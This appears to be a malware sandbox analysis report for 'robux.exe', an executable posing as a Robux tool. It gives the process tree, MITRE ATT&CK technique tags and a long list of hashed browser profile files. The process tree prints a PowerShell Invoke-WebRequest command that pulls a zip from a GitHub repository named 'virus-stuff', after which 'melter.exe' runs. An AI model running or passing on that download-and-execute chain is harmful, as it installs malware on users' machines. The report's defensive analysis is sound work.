- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5796 /prefetch:8
  2⤵
  PID:3572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2004,13304774161863466786,6240177033003803226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1552

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2268

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2548

C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1212
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3D5D.tmp\3D5E.tmp\3D5F.bat C:\Users\Admin\Downloads\robux.exe"
  2⤵
  PID:2288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5060
- - C:\Windows\system32\timeout.exe
    timeout /t 3 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2764

C:\Users\Admin\AppData\Local\Temp\Temp1_robux2.zip\virus-stuff-main\melter.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_robux2.zip\virus-stuff-main\melter.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
111c361619c017b5d09a13a56938bd54

SHA1
e02b363a8ceb95751623f25025a9299a2c931e07

SHA256
d7be4042a1e3511b0dbf0ab5c493245e4ac314440a4ae0732813db01a21ef8bc

SHA512
fc16a4ad0b56899b82d05114d7b0ca8ee610cdba6ff0b6a67dea44faf17b3105109335359b78c0a59c9011a13152744a7f5d4f6a5b66ea519df750ef03f622b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
983cbc1f706a155d63496ebc4d66515e

SHA1
223d0071718b80cad9239e58c5e8e64df6e2a2fe

SHA256
cc34b8f8e3f4bfe4c9a227d88f56ea2dd276ca3ac81df622ff5e9a8ec46b951c

SHA512
d9cf2ca46d9379902730c81e615a3eb694873ffd535c6bb3ded2dc97cdbbfb71051ab11a07754ed6f610f04285605b702b5a48a6cfda3ee3287230c41c9c45cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8e93b635e4a90cd7f35ecc583d630a87

SHA1
377557f42040c5911ea2af188b51ec6f15628899

SHA256
0cc51ef2b5c655f07ebf1a1da26928d3453fb5a446ee5c6881024238357c4b21

SHA512
17b8b1ad65258981990fe94a8a06d155720ad8469ecd6d7afa5fd8f483003a481d0990b8d1409e6a060ad5b96480dfbb38fc30a60944984b771b4f9caa525e30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cbacc918c3f6a279222ef1327e1e45c1

SHA1
d379ebd1ff0d6acabb49c1f027a3b1e2dab2175d

SHA256
d680c52a925154944b9d3b5bdadb5e1ba8badbc8e66796da08d7572a4583335c

SHA512
c76fde9686bb4cf15c5fdb714ce261b13e40a23ab05673971ae414ee6effd6d593ca914e46953fff40a82dac43456093d8f7e36bb56efeacb5c7027d8bb5ee22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
3c710a2eefb6948fe03d66aa41174107

SHA1
68b3a3b499e792c7111aab97a4cd532c1c5c6940

SHA256
be8a67c9bc7f8ea8071afb8e119f43ad26f8679bdf29f5a7a1abd89c30e81790

SHA512
9afe992f9d6f9221460ac93cb3a1f872aac96daf218cd7b72b5d9fd4a6bdef1f7911ce07c998a7568c9591bcf418fa332a459bfe38a79f5d5920b523209da327

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
6480b57ffa71d46b303c22de99169873

SHA1
213366fa6fd5a8c5537227a2a3be40a4ff018069

SHA256
a4b7443288427b86339f0f6c67ec445493c77961125a6b816844b868625c88a7

SHA512
1e744953d827a4a472793b64d2f71d05996b9a26943758e2e01e3df349f2ed3884d67ed688dec5b2ee77dab5f06caf8fd10313b7a46e70d98196006379e7ec39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

Filesize
1.0MB

MD5
4358f500dbfb4462fa889bf25508fcbf

SHA1
bc3eec23cd5281b83535d0e65c520bfecb096aae

SHA256
222e4f0edcaae31ac838d927970a460cb42018c1387643813246a04db5d98c7a

SHA512
b79dec4ec9debe7d859afc149fb535d3f18a571120b2b91a086c8ab0596caa4d74ba47c68532f8ec0284630d2bb46e61f2f63369dba286f8c640de6df43f0a65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
6f273bec37f22d3cee78c987c94aca63

SHA1
9ab75f3e366a3ff966eafd19ebadd68d879a5b70

SHA256
c67e52345ca81f20e634ad36df7c17077f50541112c3b6674458f8cb39ed8260

SHA512
e7a76417f679753d1e6fe02983e7b51524239a431f98675aa51ce2a4a5d1ea0405b764e9850cacb724e9aee8625c870d2aa8988e8bb25d507c746abde7c67912

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
7beb7265bab9dae6f964568cf8af7f98

SHA1
74b93d17b3f48ea4214d1e0d8ea370c809cfef83

SHA256
ba423fb9e4eac3f9e4adee61b24bd680ef9906341d93a62a6a3d5894e5e5cf1e

SHA512
026da70a85580e440613959962ee4eae3151bc80ad4fe4586842238bfa12529d0821b256a29bb499250f6e41aac25232ed51c0c9c4a9363509bb527739bdd450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
80a986bef7b5083c2a5c2884c3748883

SHA1
84624a0039ae1fccc964b6fce9d00ccf2a54d2b3

SHA256
e1fcf87ad3d820463aac369f1753499f0d33a26208b3d4949fb4e923386470e7

SHA512
4f202602a5f2c2b1290e27db41b08dbb19fc5b2b5fd2900d9a572ecb205cab4f2635ef684956a5de1b8e5ba25ac15b7b2c63130d874b5b2496bed4d9414c6819

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Filesize
319B

MD5
0abf43a24e2328ce7ce526593e4ae43e

SHA1
327ba24bd86a733def9765be3aa4453e0eb62fa5

SHA256
df3c73fbae80e64d58f6a0c810a05df9a33cb38bfdbb8d96c1f810425c5bd164

SHA512
b75398a00bb7ed4867d99fee7691c29c5413205d192519de5d744548f01158aa1d9dde6a7f28e2a7b26c326a69b17560fd2f9d438b21b66f84458a5ccff250ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
24KB

MD5
e15aec1998d54857595719413f8cb4d3

SHA1
cc3c42320c31b8a178dd2f6801bb2947e6580fbc

SHA256
48d38b9033e13af0fab9f29ad2ae0774627c0b1e2d2276d80d5bfb5f3db00dde

SHA512
25c17c6dd8b2ed3ae4dab867d664a60ec018a1400c4c1f73bba6f09954dc3aa939a482ac91beb9feee4b258d251d0a22a37a1e9002f81f131f194cfe717712ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
bfc74dc02f3f712ef0ce6a252d133a5c

SHA1
e40fc8499f15cf0b5b62e3bfc1b3287610425d2e

SHA256
6872fa74729411994cfbaa67517842af9639b24fb5c424924fa583bf466136c1

SHA512
37e01522eafc2e283bed415c3b1af260b479c7b8826cb513e15a1916f4f454b540d3c20f06c606988258c330f89ff2398d8a0ed55fe9e94259d65cddeb91011b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
17104ca09bdcae7a8e4f7754098ce4ee

SHA1
ba52d4998f988a78fe90b3d223adf78b7157adbb

SHA256
fb5fa64e2cb4f02839d48fcbd5d07355bb022656f03dc539b3807bdbb75a4a82

SHA512
23930594b09ecd6b7bb463a769003d1ff7a4ee9ce7a2a7e1bd06dfeef749f674645e84b1451bc5611b9caa41694f137e8e3af55c2879f9ea62ed066838c068c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
3KB

MD5
86582f93e6d8b4603c0cd035aed3b99d

SHA1
08da950da34e01d2d88f2eefaea7eb0227120efa

SHA256
2d44dccf01cdad354d28e51e46111a0c2098f7016832e75901ddf4068043d352

SHA512
847777ba8ea603c0041914e81c7d5760a3eff4deebb8c3b90d9dc747d8ab655362d5f7f6f800784deb19a68bd3bd0c73940902ec130465132cd60edbcb9aad55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
15KB

MD5
35e127810c4f3814363d575c12c8205b

SHA1
60a459feb46a47bd9288fcf67269e7f1691dc322

SHA256
ffd5e8d7c530de7a8f44af93caf68fe663185862b0aa702d21ad3f5e4d0aa55f

SHA512
e916108d650e623b787525901e623634b764755e42dfef9ac8e79ecf807138a4c7f7b1b928401a7aa4ffaed603b6717cb197055e126ec3a614004c1f0c20f93f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
334B

MD5
073da91217feb9309b4522a65e444cc9

SHA1
6a59096acd9351ae65f3c1d32591342a5b78f373

SHA256
98529097031b400d3fff19e834b01020cc578af656e2fbdfd3be5fc5bb393831

SHA512
2ef91d770411bb888c8923af322da74803f508cbaf3b2d7b1bf9da2546161ddba3d5e279b65db8678adafaac59049bfc105bfb60fdb0d3c27343196cdf0130d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
796B

MD5
d99c7171b7a21c2c5a57d0c4a86aea96

SHA1
e36fe1e8e1f5167fa135314e396d8d7400b1c0b3

SHA256
a61f090d428f122daf087e17ce0e0ee925fb54fceb07024d8b9c237eb7b0a32c

SHA512
eb220bb1c195bceafd289e8332e0a4a715f203f5d9a4f3058638159c8e1fd60a978bd54a826b90744ea36d2d41e0245221937a0d8d6b4ab7d7ce8081d88122bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1005B

MD5
92a3294ef86c5327d5f4f581e526f47f

SHA1
cc006b80745f6956a5372b32ecea79843869f67d

SHA256
a9a907882661a4831b0a1525a33bef02b6c4ff5b3d0eb2cfae8f9959bf949da0

SHA512
03235b509301e88495b59dd76e5427528efcc3f5548595de29acdd6cc076025d2127168e35efba2514513bc6e6c12a928c3195ee8a36856f6d9948b91a9b67b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
22cf10b68023e156472973e0a3bf723f

SHA1
78757c27040a350e92b7725e1d181e12b62cc2bf

SHA256
d8e3ca406e1891d54530f4b2994272990642d77c0072959bd056d5057b7b7431

SHA512
69679c859b066d9c50855350f3431853e1aa8a4983678b53347e717edb8346184f3547ed638eab75a0e1bc707a947dfc32523f3c9bac397d32ecdec240a89188

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
54112c5886addc9fa684d53286143f9f

SHA1
75654a1156e2b388cb6e1e5e580a9560b7e7cf6f

SHA256
3eb8d8a240478d2f34f679c2f8c637cde58af5d6e2242dc8a85140d47197a26a

SHA512
40dfdaaf318cc959cc5b1dc7e2da4ac73814cccf14166d920ca83d8995ffe059ad3538a3324203b08e56276aea0939561162458a372c8f4d1f35e016eb7cb40b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3df30b23426b41bf9739d5ed35050117

SHA1
9fd1b2520b2c7808f733eb4ae644e74746d3f466

SHA256
3b645a61b809ea1ae64e25af17e509011a80ec89405cbe1e0d292d100ff908b1

SHA512
5514cde02b186e10bec6a0f88bf37d6a06dff9a97cfc2e59fb7400a8bdec36dc802cdf2b8469f4b362226c427321ab0cd3ca113dc30a595e187bf600c47c6375

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
f052bf31beda8743440c5f18e35b7cdd

SHA1
6db00b9ad09ce8c5a06d919d598d9d92903eaa21

SHA256
195c743e90d17ef869e1d7dd6822e7f1ae41530747d4a3c9d5f0975e126cf782

SHA512
b29dcfc663f0ac44425504d5ed81a6f0366074fa9ebd67a9a991170c1862e8bcbabdb05d05801af4f516f92e6e54762aec9d01aa64b08ef925ed14e7f47d019a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4df4af2ec87810b157eae0ecc9ee9490

SHA1
53ef8de18c40fdc168ded7768f11b44d1008c14e

SHA256
4331fcd4e6b6beadc42f7db0e792f6cfba6598a4fd4dfe6ef21589429cb5af3e

SHA512
1a8431c3558f99f4a63609f35681c7426e5e0d8fa0f24a0e21d3210a4d789d48d2dd85a39b46a26e3828cdf337402b795cdcb13429451620da56a8e81008d4cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
68436e59271a9735c3eb63f29e124c25

SHA1
94cfe1e4acfb4d23be0863978c957fc9950da939

SHA256
8f2ff4b9d96a946bc10de5925db1864f4aea43d33fd0abc150e3e5de7d56fc36

SHA512
1e6feddcc7b7eab74679f31bc78c703a161a0aa5f0d521b85f0952f83616ac97d8ce30548766fc1c6c00e22e963592c4ce8e159895cc4ce870c227942b041097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5c47f653f1b12b5f9efb91739df4d63c

SHA1
02dc320d825c89bd7abb8c711377b8ba1ba66c7f

SHA256
d605e499ef3384b56fd92468170e54d9775d5fe85ae9a50ef865b2f069a42aed

SHA512
0acb57f237209dc110257f1f1839f3098465b516c0df53428dbf7651b9097ead0226a4a472306a27b9df6800d9fc666acd9b539991a6a8773d75a77a6cd363fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
2d10bcfd426980b40f2a408c980be069

SHA1
06d94b7b1ba50b389af2bf062732eee115388204

SHA256
c97d46bb81a40605efaa81d0ceb934a524aef786ed118ffe32d2e3d7529acca4

SHA512
09ba8b775413c98f98f28b32d49c36b0ff0da3620c268aee2dd6b3ec67a38b2e28a9469bd09dd683ba4a10533d277d8bfdc2d509badaf253670c2d44a0dfa39c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
57e3bf883506f3cd98f3a2c65c33dfde

SHA1
c516ce84adec85989356aaf2b7cb4d784e10b0e4

SHA256
181c9fc10f793e298b093abdf45909ca05dd82e5f6886af155e5ee8c3ac28600

SHA512
5b1f5d369470d803eba9b03e2f00145c0123dbfc7f17dfe992b1850d02efb7064c50b1c12a6654fef6e69abab295745061609b3a4ec16583346265afb8f4b18c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
1KB

MD5
6055ed157789d2f6919578acbf705fd6

SHA1
f5afdc2972bfff0bacab84b251d963cee3e7e811

SHA256
658193593dea815110b325f1c0e6a4266efbd3fbb179645ce2e776cb019aa7d5

SHA512
498bae1759fbf01a81b8ba4373f8902ce7f8f43cd213f24b6a467a12dc326b2ea765bd87dd108819b0a8a4eccc95e2f4f1afe5d96bf8ec85c13b18f2d730c451

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
322B

MD5
20a88a645d6a0b788f370d1f4791e27e

SHA1
24d222c1e98551ec97a4fa5c1f6d4422d5123109

SHA256
11d837f61a0de62069d1258cebc8ed4c38af5b3a889759dcbe70baff9283475f

SHA512
67e8b290d247a5b183ab82d81058200f98e2c40cae212ae28f5f32d2f2d0a61552a33917daafa17007cab354bc68b965cbabd72ba78e7bb7310b51c8739bd407

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13367163577361601

Filesize
13KB

MD5
8520f344f63af40a6f1101d3ca90a955

SHA1
080d7186e6169a8bd6c1fe3a279e7d44fd6d041b

SHA256
045fbb379fa08179b82d98b6787a4c9012510db6ec333ecaeae8589b2f4a4a12

SHA512
ee62d11e8955c49a8e6a564b9ea5404d4d9f87b7f586309aa3b07b54b60ea745ebd36538ccff015ba19c1af38ef14c7168aeda1ea94ac8998b144202dfd4aa21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

Filesize
244B

MD5
7c57d311451fae0fd04ddca9556405f3

SHA1
57092488a445b80d64b2c1bd732b96a64d9ad095

SHA256
347a81e800618699725f1edcfe1279fecd45ec912962b85cd366897cc0376485

SHA512
7ffee1639d5541397a4742b4c82bb8e5c2a65f7ee6192138d7ea9928d96447e1d45cd2928c8f9e690b98f38e99fb4317094a04614fa51d38336e06ef6c5a80e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
62f2311a23f76c5cc8d597c0be3feeb8

SHA1
3c4365fd4b361c6baa1207523e722d986bdcabf2

SHA256
e3929e92be00e971f4a7365d6dfb0198bba4d81537528237ed245d5c9fa6cfdf

SHA512
5577b1548e1549a5ed2462d1c69724cdd0d789fccd652ac77bc4c578026a032b506175038000f52a8309182c92e3f6c875bbd38b733213a12140ce95b3563faa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
326B

MD5
484b8c6f0f47b6f73937c9b55653a6d9

SHA1
4e4e25d20d0eda10405596c164ad62eeecd4f2f2

SHA256
4959ea20d7c2a6a5b1c9ebce14cddf486c5eeb8a1fc7b49f887315eda98b8207

SHA512
3f24a69699e5ebf3d1c6ca4dd55a57ab1880aab3fb9ff88931a20b6feaf97736863dd8e3b440d4625f0d942b56e7498a3ac4494f0e52ac66bb03a57a198eaf7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e3dbd0b41e4fad1439a224b2ed8064e4

SHA1
743de864ecf7fc68859f5977407620bc968b14d0

SHA256
8842bbafffd76b7ea6228380f4d12a0f5b72dd458392b2f8028b5b2a283d76b0

SHA512
21353f12a4e7bf6d51dc826f7aac3a8f0d0570a460a836d3e027fa41339423abaa5aeea4f09370c67dba5b014a28f185c9aac3b78095138ba6c7de0f5d5750a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
40da7b45beac3e1894a10cf0c43284f9

SHA1
f4e10db6fe44b6bde1bc02c98c58be5da8f658ae

SHA256
a0c452a7558444591f5f468a6d8d78dad224b561b7e6b60afe2dbf63c15d033f

SHA512
27fda7a47ce61cf1ff156946a1adb63ac6a2540ae44437c60be6437ea167696b6e2d12af42a41ebee053188d64a63517e7a84c5dc28678915f5310f779e97ef5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe584b7b.TMP

Filesize
1KB

MD5
d134a43fba80856db2ccbed2cf7f8d3c

SHA1
2fa73140a42be58e967cc5e1c310dccd7d832757

SHA256
b353c332d5c83bfa9e56009508f6757cfe03197d4edfefd1bb32c7f3bcdb2445

SHA512
8230f2cb8a9d43a0ea968138e12741ab086bd4009e6242a78d468a724f18936fbb94308cf9e1886198e93d683f26778ada49a308345db696809b53ae1d20aef0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Filesize
128KB

MD5
d05aeb63c762c95055fdd48c9e09f05a

SHA1
a7885089affe2047bfb5a64f9dd1666a39db4ac7

SHA256
0f0492e656f71d356af6edb2010e48c44d7b7a8279135fc29d2ff0e300c5472c

SHA512
2ea5ed48d83be1124b0428f9c5eace2640c80df960a3e24755065f9eb01d952e62fc43764d4e09ae0056191ae9cee6eb2bff15917be5288973f469ba669295f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Filesize
116KB

MD5
b013dad378e7ce6e242cf348551294f1

SHA1
08be88d626732e5ad71effdf8d2aa30d989a738a

SHA256
a38d145d6d8288bca4c6308f011708301ee0fd5347bfb275ea47dae85f13e9c7

SHA512
842c7f5afeda77c7cd7665d0c6027f28aaa256873173a1e57e0dc9555ec1d488fff4b6eb1f38fc78309e14e19749aaebc975d68a768c0ecb5f7dd18e96226a8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
72KB

MD5
41e38482de9a0d85a5c64832c389000d

SHA1
bf48dead88f5f5d67cb003c81e82b2a1e9df3685

SHA256
715dcd691655448df4e46faba9400a51960cd6a8c072f3d324f5dc6d714e7852

SHA512
1fdeab89bd130d163ab01c01f1e31110e4810b976416d2bc8c42905c008358f60f92201c841afc92a758e4fe71bec2a24b39403d0bf5e555daea23422131e36e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Filesize
2KB

MD5
8bfe07e36742e03eafd5ec9a6b558b73

SHA1
eb73dfb60dff174027db328ae92f7a781e1d19ed

SHA256
b8983c01ac922e3bc01bbba1c65d0e72e81e9f1ff08dcf959802beb543e5abc1

SHA512
4c2f6835aafbcb25dbf201958a8a70fcdf65d0f1ba0b40fd993c50d8150b2ecd6aac4c32ec5d064f731ed0debe003df617104345b67d6442724f1449684e03d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
319B

MD5
d2f8f4885745c226513573087c9220b2

SHA1
643088063aff0db44bc5553f03faf14723745d43

SHA256
dc1e3d3ab8fc84d6f1dbd44932cfcf40b01b76914ea671f26821aadfbee072ca

SHA512
e7cbdc3c044bc4ea32552599a0351507573b2e6eb87fde29cab94c136c8953d7d4123f4a20ad77e0c124a483271f43f9119b1a60a07f95b9555f170f45113bd1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
594B

MD5
2294cf43a59353a1ec3f58c534a758be

SHA1
617b83b35048ff918c68a5ffdadb7442e37bf186

SHA256
aae2be1baba18322e210cec6e75a4b53036e37bb5410d7c0f75499f765b9914f

SHA512
839a92e9dbc0f4dfc13e84421dd6041e6f0b7ea326ca756ffdda3499bf7617cbe5ab921340d0a751b687af18272fba333e85e65f5075758657204ec7e0a74e36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
337B

MD5
fd1dda8269fa81b93e93b059aca53093

SHA1
2c27a2356ab292f472a40d7f6a7fede59cf9f032

SHA256
968345a012ceb67b4f28fe4e6c4f2b94f82bab4d88db9e46781bc665a96a0302

SHA512
4e926ba729672506de551280528eae8b78fd4a77d4932c94af99c3d530aee748a17a8064ae97430b93e062850b0d65df10f21af91994c6fed7d5751a0975c907

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
e1b33fda6d18ed47918c1a26a54db4b4

SHA1
73d8502dbbeb18bd145f08e79d2b1c512f5ab08e

SHA256
c6534df484333aeaeaa6b8c327791d40caa5a8c83357796b18f5543c0a95cb58

SHA512
2d1b292cf2f9f7a6bda4a34afa7629419d2f0cb3e61116268d5ee7ea6de775efc6951e4bba742b8810407a4039a998d05727e9ee09cb2e60871fc0768a0209d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
1a3b57a95b71fe53b3e4ba99c3eeb279

SHA1
d6c62b57169867e73efcb87e326d7d03e1290dd0

SHA256
b502ac3bd0a0ddd7f80b2a7e4286f9b8fa331e5efa242bf79d5937c3cc54fa3c

SHA512
854b97a3c85d524100396079e8f7aa3e6d1d321b1a98b52acda5b5156156c17d09d369bf0e2ffd1e9ab8509b07996f8f8fa719949fddad799e6e88004bb059f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
ac512996f486e111cc00ee09c4c17541

SHA1
a35e4146b6e6566dfb9bef905c6a2433fad9f28f

SHA256
22ea5c9ed1cf28d52c8f7fd5e7987855d0d0309930bb851d662fceb3e874c413

SHA512
a87c0cf0c340a5f8f44b904178a614a6754507ffcd87bc87398397384ce66a3fd4be4058c04070e3ebd0aaa901494be089645ecfa476215eb61d7747a5db7a65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000001

Filesize
16KB

MD5
a33b3a3fdf5161be5bd861804961f557

SHA1
68a57897f1686a3e62ce9808165e18f31661d077

SHA256
ac33d8bc6d9a5e769472877d7dd3d035f8088274b886b16cb1898b106da48560

SHA512
c94c29a5a9da89044504fe06702f00a7fdd5bc7b85e1733c0cc9a363a812c8d8f95672ea7731643229fa4ae2f1a632c73096d90b63799f5bae7639b41151ccb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
4802f97df5ff19e11f13dc9a95a0e68f

SHA1
b38f31eac1d97311d2e85e1733d6a7959cd48ed3

SHA256
d1fed91baf3ebaf1c6c5825789080d5a39e65165cb61fd317d0dee50cc569b35

SHA512
93bfef1b97483adbc40325a3a4ed379cc57ae31857c778b22c41090bdf216b152c52ebe085193353b922089aba77c078a62d94417182d8fa731dfc788fc7a659

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
aac0697d2645fb460668e626fef6bc8e

SHA1
881ae9d36c7c1b1a37cb8bba9b9030289bf91f72

SHA256
68abdce533653605dfe77ad8c17ff656bf9cc4eb916330bcc9427a012cb0f565

SHA512
ae2e8d06e7aaff84284cb31abf0240d4afe80771cdd152ed80e9a17e2d0b476e8e0dba5ddcb49f7671999b93ddb39a32046705c78bfc3a50f89ee8138924b5bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a0487037156c98ad08aa2725e643abdd

SHA1
3a49a7d7bd8968817b66c43e60a3f0be253534ca

SHA256
adaf8e55195ef7a46ffeebdde94162910cd92956bb35d8feebe618137baceae8

SHA512
